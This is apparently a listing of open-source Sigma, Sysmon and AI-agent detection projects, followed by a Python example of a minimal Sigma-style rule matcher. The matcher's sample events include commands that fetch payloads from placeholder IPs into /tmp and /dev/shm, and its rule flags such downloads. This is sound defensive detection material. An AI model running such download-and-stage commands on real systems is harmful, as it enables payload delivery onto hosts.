A standalone SIGMA-based detection tool for EVTX, Auditd and Sysmon for Linux logs
Updated May 30, 2026 - Python
Advanced Sysmon ATT&CK configuration focused on detecting the most techniques per data source in MITRE ATT&CK, providing visibility into forensic artifact events for UEBA, detecting exploitation events with wide CVE coverage, and risk scoring of CVE, UEBA, forensic and MITRE ATT&CK events.
Elemental - An ATT&CK Threat Library
Open detection standard -- like Sigma, but for AI agents. 425 rules, shipped in Microsoft AGT, Cisco AI Defense, MISP, OWASP A-S-R-H. 97.1% recall on NVIDIA garak. NIST OSCAL Path 1.
Mapping of open-source detection rules and atomic tests.
IOK (Indicator Of Kit) is an open source language and ruleset for detecting phishing threat actor tools and tactics
Resources To Learn And Understand SIGMA Rules
Local safety layer for AI agents that use the terminal. Screens risky commands and MCP/tool calls, watches Linux activity with eBPF, blocks dangerous behavior, and keeps audit trails local. Open source, self-hosted, dry-run by default.
BlackBerry Threat Research & Intelligence
A pySigma wrapper and langchain toolkit for automatic rule creation/translation
S2AN - Mapper of Sigma/Suricata Rules/Signatures ➡️ MITRE ATT&CK Navigator
Effort to list and aggregate known malicious Google Chrome Extension IDs
Sigma detection rules for hunting with the threathunting-keywords project
Open-source security platform for AI agents -- audits skills before install, monitors 24/7, shares threat intelligence across all users.
Complete Claude skills toolkit for professional malware analysis. 5 specialized skills covering triage, dynamic analysis, detection engineering, and reporting. Works with REMnux/FlareVM offline environments.
Open source HIDS tailored for Microsoft Windows and Active Directory
Framework definitions that allow you to build a custom SIEM.
MCP server with 55 security intelligence tools — CVE/KEV, MITRE ATLAS+D3FEND, Sigma detection rules, email security posture (SPF/DMARC), domain & web intel, threat intel.
ESLint-style linter for Sigma detection rules. Validates against Sigma 2.1.0, scores rules across six quality dimensions, emits stable rule IDs.
CopyFail (CVE-2026-31431): Linux kernel page-cache PrivEsc PoC + the only public detection tool. Novel PAM auth-bypass vector + Sigma/auditd/eBPF rules.
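As an added example, not code from any of the projects listed above: a minimal matcher that applies a Sigma-style rule to process-creation events of the kind a standalone Sigma detection tool for Sysmon for Linux or auditd logs would consume. The rule content, the field names, the hypothetical `package-updater.sh` filter and the sample events are all constructed for this example. It supports Sigma's equality, `contains`, `startswith`, `endswith` and `re` modifiers, lists as OR, and plain `and`/`or`/`not` conditions; wildcards and the `1 of` / `all of` aggregation forms are deliberately left out.

```python
"""Minimal Sigma-style rule matcher over constructed log events (added example)."""
import ast
import re
from typing import Any, Dict, Iterable, List, Optional

# Constructed rule with the same structure as a Sigma YAML document (assumption:
# not taken from any published rule set). Keys of the form "Field|modifier" use
# Sigma's field-modifier syntax; a list value means "any of these" (OR).
RULE: Dict[str, Any] = {
    "title": "Download Utility Writing Into World-Writable Directory",
    "logsource": {"product": "linux", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["/curl", "/wget"],
            "CommandLine|contains": ["/tmp/", "/dev/shm/"],
        },
        # Hypothetical maintenance script whose downloads are expected noise.
        "filter_updater": {"ParentImage|endswith": "/package-updater.sh"},
        "condition": "selection and not filter_updater",
    },
    "level": "medium",
}

# Constructed Sysmon for Linux EventID 1 (process creation) events, flattened to
# the fields a process_creation rule addresses. IPs are documentation ranges.
EVENTS: List[Dict[str, Any]] = [
    {"EventID": 1, "Image": "/usr/bin/curl", "User": "www-data",
     "ParentImage": "/bin/sh",
     "CommandLine": "curl -s http://198.51.100.7/x -o /tmp/.x"},
    {"EventID": 1, "Image": "/usr/bin/wget", "User": "nobody",
     "ParentImage": "/usr/bin/bash",
     "CommandLine": "wget -q -O /dev/shm/payload http://203.0.113.9/p"},
    {"EventID": 1, "Image": "/usr/bin/curl", "User": "root",
     "ParentImage": "/usr/local/sbin/package-updater.sh",
     "CommandLine": "curl -fsSL https://example.org/repo.key -o /tmp/repo.key"},
    {"EventID": 1, "Image": "/usr/bin/ssh", "User": "dev",
     "ParentImage": "/usr/bin/git", "CommandLine": "ssh -T git@example.org"},
]


def _match_value(actual: Any, expected: Any, modifier: Optional[str]) -> bool:
    """Compare one event field with one rule value under a Sigma modifier.
    Sigma string matching is case-insensitive, so both sides are lowered
    (except for the 're' modifier, which is applied verbatim)."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier is None:
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "re":
        return re.search(str(expected), str(actual)) is not None
    raise ValueError(f"unsupported modifier: {modifier}")


def match_fieldmap(event: Dict[str, Any], fieldmap: Dict[str, Any]) -> bool:
    """A detection map matches when every field entry matches (AND across
    fields); a list of values for one field matches if any value does (OR)."""
    for key, expected in fieldmap.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), v, modifier or None) for v in values):
            return False
    return True


def eval_condition(condition: str, results: Dict[str, bool]) -> bool:
    """Evaluate a Sigma condition made of detection names and and/or/not.
    The string is parsed with the ast module and walked explicitly, so only
    boolean operators and bare identifiers are accepted; eval() is never used."""
    def walk(node: ast.AST) -> bool:
        if isinstance(node, ast.BoolOp):
            combine = all if isinstance(node.op, ast.And) else any
            return combine(walk(v) for v in node.values)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not walk(node.operand)
        if isinstance(node, ast.Name):
            return results[node.id]
        raise ValueError(f"unsupported condition syntax: {type(node).__name__}")
    return walk(ast.parse(condition, mode="eval").body)


def run_rule(rule: Dict[str, Any], events: Iterable[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Return the events for which the rule's condition evaluates to true."""
    detection = rule["detection"]
    maps = {name: fm for name, fm in detection.items() if name != "condition"}
    hits = []
    for event in events:
        results = {name: match_fieldmap(event, fm) for name, fm in maps.items()}
        if eval_condition(detection["condition"], results):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in run_rule(RULE, EVENTS):
        print(f"[{RULE['level']}] {RULE['title']}: {hit['User']} ran {hit['CommandLine']}")
```

On the constructed events the first two fire, the root download is suppressed by the `filter_updater` map, and the ssh event never satisfies the selection. A real Sigma engine also needs wildcard (`*`, `?`) matching, the `1 of`/`all of` forms and backend-specific field mapping, which is what the tools listed above add on top of this core.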